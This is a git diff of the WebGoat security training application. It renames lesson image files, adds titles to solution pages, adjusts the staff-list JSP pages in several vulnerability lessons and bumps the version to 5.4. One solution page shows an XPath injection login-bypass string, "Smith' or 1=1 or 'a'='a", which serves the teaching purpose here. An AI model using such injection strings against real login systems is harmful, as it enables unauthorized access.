diff --git a/webgoat/src/main/webapp/lesson_solutions/WeakSessionID_files/image018.png b/webgoat/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image018.png
similarity index 100%
rename from webgoat/src/main/webapp/lesson_solutions/WeakSessionID_files/image018.png
rename to webgoat/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image018.png
diff --git a/webgoat/src/main/webapp/lesson_solutions/WeakSessionID_files/image020.jpg b/webgoat/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image020.jpg
similarity index 100%
rename from webgoat/src/main/webapp/lesson_solutions/WeakSessionID_files/image020.jpg
rename to webgoat/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image020.jpg
diff --git a/webgoat/src/main/webapp/lesson_solutions/WeakSessionID_files/image021.jpg b/webgoat/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image021.jpg
similarity index 100%
rename from webgoat/src/main/webapp/lesson_solutions/WeakSessionID_files/image021.jpg
rename to webgoat/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image021.jpg
diff --git a/webgoat/src/main/webapp/lesson_solutions/WeakSessionID_files/image022.jpg b/webgoat/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image022.jpg
similarity index 100%
rename from webgoat/src/main/webapp/lesson_solutions/WeakSessionID_files/image022.jpg
rename to webgoat/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image022.jpg
diff --git a/webgoat/src/main/webapp/lesson_solutions/WeakSessionID_files/image023.jpg b/webgoat/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image023.jpg
similarity index 100%
rename from webgoat/src/main/webapp/lesson_solutions/WeakSessionID_files/image023.jpg
rename to webgoat/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image023.jpg
diff --git a/webgoat/src/main/webapp/lesson_solutions/WeakSessionID_files/image024.jpg b/webgoat/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image024.jpg
similarity index 100%
rename from webgoat/src/main/webapp/lesson_solutions/WeakSessionID_files/image024.jpg
rename to webgoat/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image024.jpg
diff --git a/webgoat/src/main/webapp/lesson_solutions/WeakSessionID_files/image025.jpg b/webgoat/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image025.jpg
similarity index 100%
rename from webgoat/src/main/webapp/lesson_solutions/WeakSessionID_files/image025.jpg
rename to webgoat/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image025.jpg
diff --git a/webgoat/src/main/webapp/lesson_solutions/WeakSessionID_files/image026.jpg b/webgoat/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image026.jpg
similarity index 100%
rename from webgoat/src/main/webapp/lesson_solutions/WeakSessionID_files/image026.jpg
rename to webgoat/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image026.jpg
diff --git a/webgoat/src/main/webapp/lesson_solutions/WeakSessionID_files/image027.jpg b/webgoat/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image027.jpg
similarity index 100%
rename from webgoat/src/main/webapp/lesson_solutions/WeakSessionID_files/image027.jpg
rename to webgoat/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image027.jpg
diff --git a/webgoat/src/main/webapp/lesson_solutions/WeakSessionID_files/image028.jpg b/webgoat/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image028.jpg
similarity index 100%
rename from webgoat/src/main/webapp/lesson_solutions/WeakSessionID_files/image028.jpg
rename to webgoat/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image028.jpg
diff --git a/webgoat/src/main/webapp/lesson_solutions/WeakSessionID_files/image029.jpg b/webgoat/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image029.jpg
similarity index 100%
rename from webgoat/src/main/webapp/lesson_solutions/WeakSessionID_files/image029.jpg
rename to webgoat/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/image029.jpg
diff --git a/webgoat/src/main/webapp/lesson_solutions/WeakSessionID_files/themedata.thmx b/webgoat/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/themedata.thmx
similarity index 100%
rename from webgoat/src/main/webapp/lesson_solutions/WeakSessionID_files/themedata.thmx
rename to webgoat/src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/themedata.thmx
diff --git a/webgoat/src/main/webapp/lesson_solutions/WsSAXInjection.html b/webgoat/src/main/webapp/lesson_solutions/WsSAXInjection.html
index d1341a49e..c5e854290 100644
--- a/webgoat/src/main/webapp/lesson_solutions/WsSAXInjection.html
+++ b/webgoat/src/main/webapp/lesson_solutions/WsSAXInjection.html
@@ -9,6 +9,7 @@ xmlns="http://www.w3.org/TR/REC-html40">
 <meta name=ProgId content=Word.Document>
 <meta name=Generator content="Microsoft Word 12">
 <meta name=Originator content="Microsoft Word 12">
+<title>Solution: Web Service SAX Injection</title>
 <link rel=File-List href="lesson_solutions/WsSAXInjection_files/filelist.xml">
 <link rel=Edit-Time-Data href="lesson_solutions/WsSAXInjection_files/editdata.mso">
 <!--[if !mso]>
diff --git a/webgoat/src/main/webapp/lesson_solutions/WsSqlInjection.html b/webgoat/src/main/webapp/lesson_solutions/WsSqlInjection.html
index 04367f85d..c9423fcdc 100644
--- a/webgoat/src/main/webapp/lesson_solutions/WsSqlInjection.html
+++ b/webgoat/src/main/webapp/lesson_solutions/WsSqlInjection.html
@@ -9,6 +9,7 @@ xmlns="http://www.w3.org/TR/REC-html40">
 <meta name=ProgId content=Word.Document>
 <meta name=Generator content="Microsoft Word 12">
 <meta name=Originator content="Microsoft Word 12">
+<title>Solution: Web Service SQL Injection</title>
 <link rel=File-List href="lesson_solutions/WsSqlInjection_files/filelist.xml">
 <link rel=Edit-Time-Data href="lesson_solutions/WsSqlInjection_files/editdata.mso">
 <!--[if !mso]>
diff --git a/webgoat/src/main/webapp/lesson_solutions/XMLInjection.html b/webgoat/src/main/webapp/lesson_solutions/XMLInjection.html
index f60220b1a..6bfd82437 100644
--- a/webgoat/src/main/webapp/lesson_solutions/XMLInjection.html
+++ b/webgoat/src/main/webapp/lesson_solutions/XMLInjection.html
@@ -9,6 +9,7 @@ xmlns="http://www.w3.org/TR/REC-html40">
 <meta name=ProgId content=Word.Document>
 <meta name=Generator content="Microsoft Word 12">
 <meta name=Originator content="Microsoft Word 12">
+<title>Solution: XML Injection</title>
 <link rel=File-List href="lesson_solutions/XMLInjection_files/filelist.xml">
 <link rel=Edit-Time-Data href="lesson_solutions/XMLInjection_files/editdata.mso">
 <!--[if !mso]>
diff --git a/webgoat/src/main/webapp/lesson_solutions/XPATHInjection.html b/webgoat/src/main/webapp/lesson_solutions/XPATHInjection.html
index ca1d360ce..09208cf6d 100644
--- a/webgoat/src/main/webapp/lesson_solutions/XPATHInjection.html
+++ b/webgoat/src/main/webapp/lesson_solutions/XPATHInjection.html
@@ -9,6 +9,7 @@ xmlns="http://www.w3.org/TR/REC-html40">
 <meta name=ProgId content=Word.Document>
 <meta name=Generator content="Microsoft Word 12">
 <meta name=Originator content="Microsoft Word 12">
+<title>Solution: XPATH Injection</title>
 <link rel=File-List href="lesson_solutions/XPATHInjection_files/filelist.xml">
 <link rel=Edit-Time-Data href="lesson_solutions/XPATHInjection_files/editdata.mso">
 <!--[if !mso]>
@@ -747,7 +748,7 @@ field-end'></span><![endif]--> Inject XPath payload</p>
 <p class=MsoNormal><o:p>&nbsp;</o:p></p>
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif";mso-bidi-font-weight:
 bold'>
-Injecting Smith' or 1=1 or 'a'='a will log you on
+Injecting <b>Smith' or 1=1 or 'a'='a</b> will log you on
 as the first user defined in the system. Password is a required field, so there
 you can enter whatever you want.<br><br>
 This is what the server gets:<br>
diff --git a/webgoat/src/main/webapp/lessons/CrossSiteScripting/ListStaff.jsp b/webgoat/src/main/webapp/lessons/CrossSiteScripting/ListStaff.jsp
index 2a8d07731..4f7acd643 100644
--- a/webgoat/src/main/webapp/lessons/CrossSiteScripting/ListStaff.jsp
+++ b/webgoat/src/main/webapp/lessons/CrossSiteScripting/ListStaff.jsp
@@ -18,9 +18,11 @@
 			      	<%
 			      	List employees = (List) session.getAttribute("CrossSiteScripting." + CrossSiteScripting.STAFF_ATTRIBUTE_KEY);
 			      	Iterator i = employees.iterator();
+			      	EmployeeStub stub = (EmployeeStub) i.next();%>
+			      	<option selected value="<%=Integer.toString(stub.getId())%>"><%=stub.getFirstName() + " " + stub.getLastName()+ " (" + stub.getRole() + ")"%></option><%
 					while (i.hasNext())
 					{
-						EmployeeStub stub = (EmployeeStub) i.next();%>
+						stub = (EmployeeStub) i.next();%>
 						<option value="<%=Integer.toString(stub.getId())%>"><%=stub.getFirstName() + " " + stub.getLastName()+ " (" + stub.getRole() + ")"%></option><%
 					}%>
   </select>
@@ -32,7 +34,7 @@
 				if (webSession.isAuthorizedInLesson(myUserId, CrossSiteScripting.CREATEPROFILE_ACTION))
 				{
 				%>
-					<input type="submit" name="action" value="<%=CrossSiteScripting.CREATEPROFILE_ACTION%>"/><br>
+					<input type="submit" disabled name="action" value="<%=CrossSiteScripting.CREATEPROFILE_ACTION%>"/><br>
 				<% 
 				}
 				%>
diff --git a/webgoat/src/main/webapp/lessons/DBCrossSiteScripting/ListStaff.jsp b/webgoat/src/main/webapp/lessons/DBCrossSiteScripting/ListStaff.jsp
index 60c963f11..a7c831377 100755
--- a/webgoat/src/main/webapp/lessons/DBCrossSiteScripting/ListStaff.jsp
+++ b/webgoat/src/main/webapp/lessons/DBCrossSiteScripting/ListStaff.jsp
@@ -18,9 +18,11 @@
 			      	<%
 			      	List employees = (List) session.getAttribute("DBCrossSiteScripting." + DBCrossSiteScripting.STAFF_ATTRIBUTE_KEY);
 			      	Iterator i = employees.iterator();
+			      	EmployeeStub stub = (EmployeeStub) i.next();%>
+			      	<option selected value="<%=Integer.toString(stub.getId())%>"><%=stub.getFirstName() + " " + stub.getLastName()+ " (" + stub.getRole() + ")"%></option><%
 					while (i.hasNext())
 					{
-						EmployeeStub stub = (EmployeeStub) i.next();%>
+						stub = (EmployeeStub) i.next();%>
 						<option value="<%=Integer.toString(stub.getId())%>"><%=stub.getFirstName() + " " + stub.getLastName()+ " (" + stub.getRole() + ")"%></option><%
 					}%>
   </select>
@@ -32,7 +34,7 @@
 				if (webSession.isAuthorizedInLesson(myUserId, DBCrossSiteScripting.CREATEPROFILE_ACTION))
 				{
 				%>
-					<input type="submit" name="action" value="<%=DBCrossSiteScripting.CREATEPROFILE_ACTION%>"/><br>
+					<input type="submit" disabled name="action" value="<%=DBCrossSiteScripting.CREATEPROFILE_ACTION%>"/><br>
 				<% 
 				}
 				%>
diff --git a/webgoat/src/main/webapp/lessons/DBSQLInjection/ListStaff.jsp b/webgoat/src/main/webapp/lessons/DBSQLInjection/ListStaff.jsp
index 035ab564c..3691a8280 100755
--- a/webgoat/src/main/webapp/lessons/DBSQLInjection/ListStaff.jsp
+++ b/webgoat/src/main/webapp/lessons/DBSQLInjection/ListStaff.jsp
@@ -19,9 +19,11 @@
 			      	<%
 			      	List employees = (List) session.getAttribute("DBSQLInjection." + DBSQLInjection.STAFF_ATTRIBUTE_KEY);
 			      	Iterator i = employees.iterator();
+			      	EmployeeStub stub = (EmployeeStub) i.next();%>
+			      	<option selected value="<%=Integer.toString(stub.getId())%>"><%=stub.getFirstName() + " " + stub.getLastName()+ " (" + stub.getRole() + ")"%></option><%
 					while (i.hasNext())
 					{
-						EmployeeStub stub = (EmployeeStub) i.next();%>
+						stub = (EmployeeStub) i.next();%>
 						<option value="<%=Integer.toString(stub.getId())%>"><%=stub.getFirstName() + " " + stub.getLastName()+ " (" + stub.getRole() + ")"%></option><%
 					}%>
   </select>
@@ -33,7 +35,7 @@
 				if (webSession.isAuthorizedInLesson(myUserId, DBSQLInjection.CREATEPROFILE_ACTION))
 				{
 				%>
-					<input type="submit" name="action" value="<%=DBSQLInjection.CREATEPROFILE_ACTION%>"/><br>
+					<input type="submit" disabled name="action" value="<%=DBSQLInjection.CREATEPROFILE_ACTION%>"/><br>
 				<% 
 				}
 				%>
diff --git a/webgoat/src/main/webapp/lessons/GoatHillsFinancial/ListStaff.jsp b/webgoat/src/main/webapp/lessons/GoatHillsFinancial/ListStaff.jsp
index f3bbd0055..40e78abb0 100755
--- a/webgoat/src/main/webapp/lessons/GoatHillsFinancial/ListStaff.jsp
+++ b/webgoat/src/main/webapp/lessons/GoatHillsFinancial/ListStaff.jsp
@@ -19,9 +19,11 @@
 			      	<%
 			      	List employees = (List) session.getAttribute("GoatHillsFinancial." + GoatHillsFinancial.STAFF_ATTRIBUTE_KEY);
 			      	Iterator i = employees.iterator();
+			      	EmployeeStub stub = (EmployeeStub) i.next();%>
+			      	<option selected value="<%=Integer.toString(stub.getId())%>"><%=stub.getFirstName() + " " + stub.getLastName()+ " (" + stub.getRole() + ")"%></option><%
 					while (i.hasNext())
 					{
-						EmployeeStub stub = (EmployeeStub) i.next();%>
+						stub = (EmployeeStub) i.next();%>
 						<option value="<%=Integer.toString(stub.getId())%>"><%=stub.getFirstName() + " " + stub.getLastName()+ " (" + stub.getRole() + ")"%></option><%
 					}%>
   </select>
@@ -33,7 +35,7 @@
 				if (webSession.isAuthorizedInLesson(myUserId, GoatHillsFinancial.CREATEPROFILE_ACTION))
 				{
 				%>
-					<input type="submit" name="action" value="<%=GoatHillsFinancial.CREATEPROFILE_ACTION%>"/><br>
+					<input type="submit" name="action" disabled value="<%=GoatHillsFinancial.CREATEPROFILE_ACTION%>"/><br>
 				<% 
 				}
 				%>
diff --git a/webgoat/src/main/webapp/lessons/RoleBasedAccessControl/ListStaff.jsp b/webgoat/src/main/webapp/lessons/RoleBasedAccessControl/ListStaff.jsp
index a3c2158de..16e976851 100644
--- a/webgoat/src/main/webapp/lessons/RoleBasedAccessControl/ListStaff.jsp
+++ b/webgoat/src/main/webapp/lessons/RoleBasedAccessControl/ListStaff.jsp
@@ -19,9 +19,11 @@
 			      	<%
 			      	List employees = (List) session.getAttribute("RoleBasedAccessControl." + RoleBasedAccessControl.STAFF_ATTRIBUTE_KEY);
 			      	Iterator i = employees.iterator();
+			      	EmployeeStub stub = (EmployeeStub) i.next();%>
+			      	<option selected value="<%=Integer.toString(stub.getId())%>"><%=stub.getFirstName() + " " + stub.getLastName()+ " (" + stub.getRole() + ")"%></option><%
 					while (i.hasNext())
 					{
-						EmployeeStub stub = (EmployeeStub) i.next();%>
+						stub = (EmployeeStub) i.next();%>
 						<option value="<%=Integer.toString(stub.getId())%>"><%=stub.getFirstName() + " " + stub.getLastName()+ " (" + stub.getRole() + ")"%></option><%
 					}%>
   </select>
@@ -33,7 +35,7 @@
 				if (webSession.isAuthorizedInLesson(myUserId, RoleBasedAccessControl.CREATEPROFILE_ACTION))
 				{
 				%>
-					<input type="submit" name="action" value="<%=RoleBasedAccessControl.CREATEPROFILE_ACTION%>"/><br>
+					<input type="submit" name="action" disabled value="<%=RoleBasedAccessControl.CREATEPROFILE_ACTION%>"/><br>
 				<% 
 				}
 				%>
diff --git a/webgoat/src/main/webapp/lessons/SQLInjection/ListStaff.jsp b/webgoat/src/main/webapp/lessons/SQLInjection/ListStaff.jsp
index 425867c3b..5b6256e71 100644
--- a/webgoat/src/main/webapp/lessons/SQLInjection/ListStaff.jsp
+++ b/webgoat/src/main/webapp/lessons/SQLInjection/ListStaff.jsp
@@ -19,9 +19,11 @@
 			      	<%
 			      	List employees = (List) session.getAttribute("SQLInjection." + SQLInjection.STAFF_ATTRIBUTE_KEY);
 			      	Iterator i = employees.iterator();
+			      	EmployeeStub stub = (EmployeeStub) i.next();%>
+			      	<option selected value="<%=Integer.toString(stub.getId())%>"><%=stub.getFirstName() + " " + stub.getLastName()+ " (" + stub.getRole() + ")"%></option><%
 					while (i.hasNext())
 					{
-						EmployeeStub stub = (EmployeeStub) i.next();%>
+						stub = (EmployeeStub) i.next();%>
 						<option value="<%=Integer.toString(stub.getId())%>"><%=stub.getFirstName() + " " + stub.getLastName()+ " (" + stub.getRole() + ")"%></option><%
 					}%>
   </select>
@@ -33,7 +35,7 @@
 				if (webSession.isAuthorizedInLesson(myUserId, SQLInjection.CREATEPROFILE_ACTION))
 				{
 				%>
-					<input type="submit" name="action" value="<%=SQLInjection.CREATEPROFILE_ACTION%>"/><br>
+					<input type="submit" disabled name="action" value="<%=SQLInjection.CREATEPROFILE_ACTION%>"/><br>
 				<% 
 				}
 				%>
diff --git a/webgoat/src/main/webapp/main.jsp b/webgoat/src/main/webapp/main.jsp
index 9df682eb9..379a36931 100644
--- a/webgoat/src/main/webapp/main.jsp
+++ b/webgoat/src/main/webapp/main.jsp
@@ -213,7 +213,7 @@ StringBuffer buildList = new StringBuffer();
 			    {
 			    	%>
 			    	<div id="training_wrap">
-			    	<div id="training" class="info"><a href="http://yehg.net/lab/pr0js/training/webgoat.php"><%=WebGoatI18N.get("SolutionVideos")%></a></div>
+			    	<div id="training" class="info"><a href="http://yehg.net/lab/pr0js/training/webgoat.php" target="_blank"><%=WebGoatI18N.get("SolutionVideos")%></a></div>
 			    	<div id="reset" class="info"><a href="<%=webSession.getRestartLink()%>"><%=WebGoatI18N.get("RestartLesson")%></a></div>
 			    	</div>
 	    			<%
diff --git a/webgoat/src/main/webapp/webgoat.jsp b/webgoat/src/main/webapp/webgoat.jsp
index 290ac9799..b1bad31ba 100644
--- a/webgoat/src/main/webapp/webgoat.jsp
+++ b/webgoat/src/main/webapp/webgoat.jsp
@@ -9,7 +9,7 @@ WebSession webSession = ((WebSession) session.getAttribute("websession"));
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
 <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
-<title>WebGoat V5.2</title>
+<title>WebGoat V5.4</title>
 <link rel="stylesheet" href="css/webgoat.css" type="text/css" />
 </head>
 
@@ -54,10 +54,12 @@ by Bruce Mayhew. Please send all comments to Bruce at <%=webSession.getWebgoatCo
 		<div align="center" class="style2">David Anderson</div>
 		<div align="center" class="style2">Rogan Dawes</div>
 		<div align="center" class="style2">Laurence Casey (Graphics)</div>
+		<div align="center" class="style2">Brian Ciomei</div>
 		</td>
 		<td valign="top">
 		<div align="center" class="style2">Chuck Willis</div>
 		<div align="center" class="style2">Cam Morris</div>
+		<div align="center" class="style2">Yiannis Pavlosoglou</div>
 		<div align="center" class="style2"></div>
 
 		</td>